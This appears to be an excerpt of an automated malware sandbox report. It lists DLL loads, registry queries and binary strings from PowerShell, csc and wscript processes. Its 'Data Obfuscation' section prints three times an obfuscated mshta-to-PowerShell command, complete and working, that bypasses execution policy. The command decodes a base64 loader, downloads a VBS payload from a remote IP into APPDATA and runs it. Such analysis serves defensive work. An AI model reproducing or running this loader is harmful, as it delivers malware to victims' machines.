Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: q:C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.pdb source: powershell.exe, 00000003.00000002.2242163202.0000000004B09000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2508515611.00000000074E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2511587289.0000000007B4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2883784931.0000000001280000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2883784931.0000000001280000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2508515611.00000000074E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2511587289.0000000007B4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2511587289.0000000007B4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: microsoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershe

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
